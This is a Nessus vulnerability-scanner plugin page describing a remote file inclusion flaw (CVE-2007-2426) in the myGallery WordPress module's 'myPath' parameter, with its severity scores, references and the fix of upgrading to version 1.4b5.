myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion

high Nessus Plugin ID 25116

Synopsis

The remote web server contains a PHP script that is affected by a remote file include vulnerability.

Description

The third-party myGallery module for WordPress installed on the remote host fails to sanitize input to the 'myPath' parameter of the '/mygallery/myfunctions/mygallerybrowser.php' script before using it to include PHP code. An unauthenticated attacker can exploit this issue to view arbitrary files on the remote host or possibly to execute arbitrary PHP code, perhaps from third-party hosts.

Note that exploitation of this issue does not require that PHP's 'register_globals' setting be enabled.

Solution

Upgrade to myGallery version 1.4b5 or later.

See Also

https://www.wildbits.de/2007/04/29/sicherheitsluecke-in-mygallery/

Plugin Details

Severity: High

ID: 25116

File Name: mygallery_mypath_file_include.nasl

Version: 1.20

Type: remote

Family: CGI abuses

Published: 4/30/2007

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: High

Score: 7.0

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 6.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

CPE: cpe:/a:wordpress:wordpress

Required KB Items: installed_sw/WordPress, www/PHP

Exploit Available: true

Exploit Ease: Exploits are available

Vulnerability Publication Date: 4/29/2007

Exploitable With

CANVAS (CANVAS)

Reference Information

CVE: CVE-2007-2426

BID: 23702